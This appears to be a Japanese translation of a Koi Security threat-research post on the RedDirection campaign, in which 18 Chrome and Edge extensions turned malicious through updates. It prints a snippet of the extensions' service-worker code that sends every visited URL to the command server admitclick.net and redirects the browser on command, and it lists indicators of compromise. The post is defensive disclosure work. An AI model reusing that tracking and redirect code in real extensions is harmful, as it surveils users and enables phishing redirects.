TokyoBlackHatNews

koi.ai 12分で読了

Googleとマイクロソフトがそれらを信頼していた。230万ユーザーがインストール。それらはマルウェアだった。

TL;DR – 単一の「認証済み」カラーピッカーの調査により、ChromeとEdge全体で230万人の膨大なユーザーに感染した18個の悪意のある拡張機能の組織的なキャンペーンが明らかになりました。

Googleの認証バッジ、10万以上のインストール数、800以上のレビュー、ストアでの特別な配置を備えたChrome拡張機能が信頼できると思いますか?もう一度考え直してください。

「Color Picker, Eyedropper — Geco colorpick」を紹介します。この拡張機能は、信頼できるシグナルにどれだけ高度な脅威アクターが悪用しているかを完璧に示しています。これは週末に慌てて作られた明らかな詐欺拡張機能ではありません。これは約束したものを正確に提供する(機能的なカラーピッカー)と同時に、ブラウザをハイジャックし、アクセスしたすべてのウェブサイトを追跡し、永続的なコマンド&コントロールバックドアを維持する慎重に作成されたトロイの木馬です。それだけでなく、バージョン更新により悪意あるものになる前に、数年間は正当なままでした。

それでは不十分なかのように、RedDirectionキャンペーンに会いましょう。カラーピッカー拡張機能への調査により、それは氷山の一角に過ぎないことが明らかになりました。コマンド&コントロールインフラストラクチャを分析し、同様のコードパターンを追跡することにより、RedDirectionキャンペーンと呼ぶもの(ChromeとEdgeストアにまたがる18個の悪意のある拡張機能の洗練された相互プラットフォームネットワーク)を発見しました。すべて同じハイジャック機能を共有しています。これら18個の拡張機能を合わせると、両方のブラウザ全体で230万人以上のユーザーに感染しており、ドキュメント化した最大のブラウザハイジャック操作の1つを作成しています。

これらの拡張機能は、多様なカテゴリーにわたる人気のある生産性およびエンターテインメントツールを装っています。絵文字キーボード、天気予報、ビデオスピードコントローラー、DiscordとTikTok用のVPNプロキシ、ダークテーム、ボリュームブースター、YouTubeアンブロッカーです。それぞれは正当な機能を提供しながら、カラーピッカーで発見した同じブラウザ監視およびハイジャック機能をひそかに実装しています。

これらの拡張機能の多くは、ChromeウェブストアとマイクロソフトEdgeアドオンストアの両方で認証ステータスまたは特別な配置を達成しており、セキュリティ上の失敗は両方の主要なブラウザマーケットプレイスに拡がることを示しています。各拡張機能は独自のコマンド&コントロールサブドメイン(admitclick.netやclick.videocontrolls.com、c.undiscord.comなど)で動作し、別々のオペレーターの外観を与えながら、実際には両方のプラットフォームにまたがる同じ集中型攻撃インフラストラクチャの一部です。

では、これらの拡張機能は実際に何をするのか?

すべてのタブ更新でのブラウザハイジャック

マルウェアは、新しいページに移動するたびにアクティブになる洗練されたブラウザハイジャック機構を実装しています。拡張機能のバックグラウンドサービスワーカー内に隠されているコードは、すべてのタブアクティビティを監視します。

chrome.tabs.onUpdated.addListener(function() {
var t = o(r().mark((functiont(e, o, i) {
// 現在のURLをリモートサーバーに送信する悪意のあるコードreturn r().wrap((function(t) {
for (;;) switch (t.prev = t.next) {
case0:
if (!o.url) {
                    t.next = 8;
break;
                }
return c = {
method: "POST",
redirect: "follow"                }, t.next = 5, fetch("https://admitclick.net/api?key=565ebded7e63cdfa5fcbe5734bdb4281a85d6f21&uuid=" + a + "&allowempty=1&out=" + encodeURIComponent(o.url) + "&format=txt&r=" + Math.random(), c)

ウェブサイトにアクセスするたびに、拡張機能は以下のことを実行します。

  1. アクセスしているページのURLをキャプチャします。
  2. 一意の追跡IDと共にリモートサーバーに送信します。
  3. コマンド&コントロールサーバーから潜在的なリダイレクトURLを受け取ります。
  4. 指示されている場合、ブラウザを自動的にリダイレクトします。

マルウェアは存在しなかった。そのまでになるまでは。

これらは最初から悪意のある拡張機能ではありませんでした。マルウェアは、拡張機能の生涯を通じてバージョン更新で導入されました。各コードベースは非常にきれいでしたが、時には数年間、マルウェアが実装される前に。

Googleとマイクロソフトがブラウザ拡張機能の更新をどのように処理するかのため、これらの悪意のあるバージョンは200万人以上のユーザー全体で両方のプラットフォーム全体で静かに自動インストールされました。ほとんどの場合、誰もクリックしませんでした。フィッシングではありません。ソーシャルエンジニアリングではありません。ただし、静かなバージョンバンプを備えた信頼できる拡張機能が生産性ツールを監視マルウェアに変えました。

Googleとマイクロソフトはスケールのために更新パイプラインを構築しましたが、精査ではありません。認証ステータス。特別な配置。シームレスなロールアウト。ユーザーの安全を保証することを目的とした非常に同じ仕組みがマルウェアのリーチを増幅させました。これはエッジケースではなく、サプライチェーンの災害です。

完璧なトロイの木馬

RedDirectionキャンペーンが特に悪質である理由は、目立たないように隠れることの包括的なアプローチです。18個の拡張機能のそれぞれは、約束されたとおりに機能します。色の選択、ビデオスピードの制御、天気予報の提供、またはボリュームの向上であるかどうかにかかわらず、ユーザーが期待する専門的な機能を提供します。しかし、これらの正当なファサードの背後には、生産性ツール全体のエコシステムにわたってブラウザセッションの任意の瞬間を武器にすることができる洗練されたハイジャック機構があります。

次のシナリオを考えてみましょう。Zoomミーティングの招待を受け取り、リンクをクリックします。会議に参加する代わりに、悪意のある拡張機能の1つがリクエストをインターセプトし、参加するために「重要なZoom更新」をダウンロードする必要があると主張する説得力のある偽のページにリダイレクトします。正当なソフトウェアのように見えるものをダウンロードしますが、システムに追加のマルウェアをインストールしたばかりであり、コンピューター全体の乗っ取りとデバイスの完全な危殆化につながる可能性があります。

または、銀行のウェブサイトにログインすることを想像してください。拡張機能がリクエストをキャプチャし、シームレスに銀行のログインページのピクセル完璧なレプリカにリダイレクトし、攻撃者のサーバーでホストされています。あなたは安全にアカウントにアクセスしていると思って認証情報を入力しますが、サイバー犯罪者に銀行情報を差し上げたばかりです。

これらは理論的な攻撃ではありません。18個の異なる拡張機能全体で230万人のユーザーが監視されている場合、キャンペーンは、いつでも悪用される可能性のある大規模な永続的な中間者能力を作成します。すべてのクリック、すべてのウェブサイトの訪問、すべてのオンライン取引は、この広大なネットワーク全体にわたって潜在的な攻撃ベクトルになります。攻撃者は、個々のウェブサイトを危険にさらしたり、フィッシングメールに依存する必要はありません。彼らはすでに信頼できるツールの多様なポートフォリオ全体を通じてユーザーのブラウザ自体を危険にさらしています。

直ちに必要なアクション

これらのRedDirectionキャンペーンの拡張機能がインストールされている場合:

  1. すべての影響を受けた拡張機能をChromeとEdgeから直ちに削除してください。
  2. ブラウザデータをクリアして、保存されている追跡識別子を削除してください
  3. 完全なシステムマルウェアスキャンを実行して、追加の感染がないかどうかを確認してください
  4. 機密サイトにアクセスした場合、アカウントを監視して疑わしいアクティビティがないか確認してください
  5. インストールされたすべての拡張機能を確認して、提供されたIOCを使用して同様の疑わしい動作を探してください

より大きな図

RedDirectionキャンペーンは、個々の拡張機能をはるかに超えて拡張するマーケットプレイスセキュリティの体系的な失敗を暴露しています。

  • 規模での検証:Googleとマイクロソフトの検証プロセスは、18個の異なる拡張機能全体の洗練されたマルウェアを検出するのに失敗しました。代わりに、検証バッジと特別な配置を通じてユーザーに複数を昇進させました。
  • サプライチェーンの乗っ取り:キャンペーンは、攻撃者が新しい悪意のある拡張機能を作成するか、悪意のある更新を通じて以前の正当な拡張機能を武器にすることにより、拡張機能エコシステムを危険にさらす方法を示しています。
  • 信頼シグナル武器化:攻撃者は、ユーザーが依存するすべての信頼シグナル(検証バッジ、インストール数、特別な配置、数年の正当な操作、肯定的なレビュー)を正常に悪用し、プラットフォーム自体の信頼性メカニズムをユーザーに対して転用しました。

では、今はどうなるのか?

RedDirectionキャンペーンは、ブラウザ拡張機能セキュリティの分水嶺の瞬間を表しています。18個の拡張機能全体で230万人以上の感染したユーザーがいることにより、これは単なる別のマルウェア発見ではなく、現在のマーケットプレイスセキュリティモデルが根本的に壊れていることの証です。攻撃者はGoogleとマイクロソフトのレビュープロセスを回避しただけでなく、規模でシステム的に悪用し、マーケットプレイスを洗練された監視マルウェアの配布プラットフォームに変えました。

このキャンペーンは、脅威アクターが個々の攻撃を超えて進化して、アクティベーション前に何年も休止したままでいることができる包括的なインフラストラクチャを作成する方法を示しています。正当な機能、段階的な展開、および多様な拡張機能カテゴリの組み合わせにより、ユーザーを保護することを目的とした設計されたすべてのセキュリティメカニズムをバイパスした完璧な嵐が生まれました。

このレポートは、Koi Securityのリサーチチームによって作成され、健全な妄想とより安全なオープンソースエコシステムへの希望が含まれています。

驚くべきことに、MITREが最新のカテゴリを導入した直後に、私たちはすべてをまず発見しました:IDE拡張機能。このスペースの保護の重要性をさらに強調しています。

長すぎる間、最も高い権限で実行されることが多い信頼できないサードパーティコードの使用は、企業と攻撃者の両方のレーダーを飛んできました。その時代は終わっています。潮は変わりつつあります。

Koiを作成しました。この瞬間に応えるために。実践者と企業の両方のために。私たちのプラットフォームは、Chromeウェブストア、VSCode、Hugging Face、Homebrew、GitHubなどのマーケットプレイスからチームがプルするすべてを発見、評価、および管理するのに役立ちます。

Fortune 50企業、BFSI、および世界最大のテクノロジー企業の一部に信頼されているKoiは、この広大な攻撃表面全体で可視性を獲得し、ガバナンスを確立し、リスクを先制的に削減するために必要なセキュリティプロセスを自動化します。

ソリューションについて興味がある場合、または行動する準備ができている場合は、デモを予約するか、こちらで連絡してください。🤙

今後来ることができるサプライズがいくつかあります。お楽しみに。

IOC(侵害の指標)

拡張機能ID

Chrome:

  • kgmeffmlnkfnjpgmdndccklfigfhajen — [絵文字キーボード—コピー&あなたの絵文字を過去に。]
  • dpdibkjjgbaadnnjhkmmnenkmbnhpobj — [無料天気予報]
  • gaiceihehajjahakcglkhmdbbdclbnlf — [ビデオスピードコントローラー—ビデオマネージャー]
  • mlgbkfnjdmaoldgagamcnommbbnhfnhf — [DiscordをUnlock—どこからでもDiscordのブロックを解除するVPNプロキシ]
  • eckokfcjbjbgjifpcbdmengnabecdakp — [ダークテーム—Chrome用ダークリーダー]
  • mgbhdehiapbjamfgekfpebmhmnmcmemg — [ボリュームマックス—究極のサウンドブースター]
  • cbajickflblmpjodnjoldpiicfmecmif — [TikTokのブロック解除—ワンクリックプロキシでのシームレスアクセス]
  • pdbfcnhlobhoahcamoefbfodpmklgmjm — [YouTubeのUnlock VPN]
  • eokjikchkppnkdipbiggnmlkahcdkikp — [カラーピッカー、アイドロッパー—Geco colorpick]
  • ihbiedpeaicgipncdnnkikeehnjiddck — [天気]

Edge:

  • jjdajogomggcjifnjgkpghcijgkbcjdi — [TikTokのUnlock]
  • mmcnmppeeghenglmidpmjkaiamcacmgm — [ボリュームブースター—音を増やしてください]
  • ojdkklpgpacpicaobnhankbalkkgaafp — [Webサウンドイコライザー]
  • lodeighbngipjjedfelnboplhgediclp — [ヘッダー値]
  • hkjagicdaogfgdifaklcgajmgefjllmd — [フラッシュプレーヤー—ゲームエミュレータ]
  • gflkbgebojohihfnnplhbdakoipdbpdm — [YoutubeUnbocked]
  • kpilmncnoafddjpnbhepaiilgkdcieaf — [SearchGPT—検索エンジン用ChatGPT]
  • caibdnkmpnjhjdfnomfhijhmebigcelo — [DiscordのUnlock]

ネットワーク指標

  • admitab[.]com
  • edmitab[.]com
  • click.videocontrolls[.]com
  • c.undiscord[.]com
  • click.darktheme[.]net
  • c.jermikro[.]com
  • c.untwitter[.]com
  • c.unyoutube[.]net
  • admitclick[.]net
  • addmitad[.]com
  • admiitad[.]com
  • abmitab[.]com
  • admitlink[.]net

翻訳元: https://www.koi.ai/blog/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware

ソース: koi.ai
#Chrome #Microsoft Edge #サプライチェーン攻撃 #セキュリティ脆弱性 #トロイの木馬 #ブラウザハイジャック #ブラウザ拡張機能 #マーケットプレイスセキュリティ #マルウェア #監視マルウェア

関連記事

Claudeがサイバー兵器となるときAI軍拡競争が始まった

野生の最初の悪意あるMCP:あなたのメールを盗んでいるPostmarkバックドア

目に見えないコードを使用した初の自己増殖ワーム、OpenVSXマーケットプレイスを襲う